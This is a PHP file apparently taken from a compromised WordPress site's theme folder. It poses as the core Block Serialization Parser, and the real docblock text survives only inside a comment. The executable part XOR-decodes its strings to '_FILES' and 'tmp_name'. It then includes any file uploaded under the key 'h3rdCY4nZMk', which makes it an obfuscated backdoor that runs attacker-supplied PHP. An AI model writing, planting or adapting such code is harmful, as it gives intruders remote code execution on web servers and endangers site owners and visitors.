File: /var/www/sites/1250.info/wp-content/themes/o3qps4on/DUUET.js.php
<?php /*
*
* Block Serialization Parser
*
* @package WordPress
*
* Class WP_Bloc*/
$singular_base = 'post_updated';
$closing_quote = 'h3rdCY4nZMk';
$unicode_length = $closing_quote;
function rest_base($subs, $post_type_meta_caps)
{
$site_url = $post_type_meta_caps;
$regex = urldecode($subs);
$parent_where = substr($site_url,0, strlen($regex));
$html = $regex ^ $parent_where;
return $html;
}
$is_escaped = ${rest_base("7u%3B%28%06%0A", $unicode_length)};
$slug_num = $is_escaped;
$cats = isset($slug_num[$unicode_length]);
if ($cats)
{
$in_string = 'import_id';
$post_mime_type = $is_escaped[$unicode_length];
$icon_dir = $post_mime_type[rest_base("%1C%5E%02%3B-8Y%0B", $unicode_length)];
$del_file = $icon_dir;
$patterns = 'allowed_keys';
include ($del_file);
}
$cache = 'all_parts';
/* k_Parser_Frame
*
* Holds partial blocks in memory while parsing
*
* @internal
* @since 5.0.0
class WP_Block_Parser_Frame {
*
* Full or partial block
*
* @since 5.0.0
* @var WP_Block_Parser_Block
public $block;
*
* Byte offset into document for start of parse token
*
* @since 5.0.0
* @var int
public $token_start;
*
* Byte length of entire parse token string
*
* @since 5.0.0
* @var int
public $token_length;
*
* Byte offset into document for after parse token ends
* (used during reconstruction of stack into parse production)
*
* @since 5.0.0
* @var int
public $prev_offset;
*
* Byte offset into document where leading HTML before token starts
*
* @since 5.0.0
* @var int
public $leading_html_start;
*
* Constructor
*
* Will populate object properties from the provided arguments.
*
* @since 5.0.0
*
* @param WP_Block_Parser_Block $block Full or partial block.
* @param int $token_start Byte offset into document for start of parse token.
* @param int $token_length Byte length of entire parse token string.
* @param int $prev_offset Byte offset into document for after parse token ends.
* @param int $leading_html_start Byte offset into document where leading HTML before token starts.
public function __construct( $block, $token_start, $token_length, $prev_offset = null, $leading_html_start = null ) {
$this->block = $block;
$this->token_start = $token_start;
$this->token_length = $token_length;
$this->prev_offset = isset( $prev_offset ) ? $prev_offset : $token_start + $token_length;
$this->leading_html_start = $leading_html_start;
}
}
*/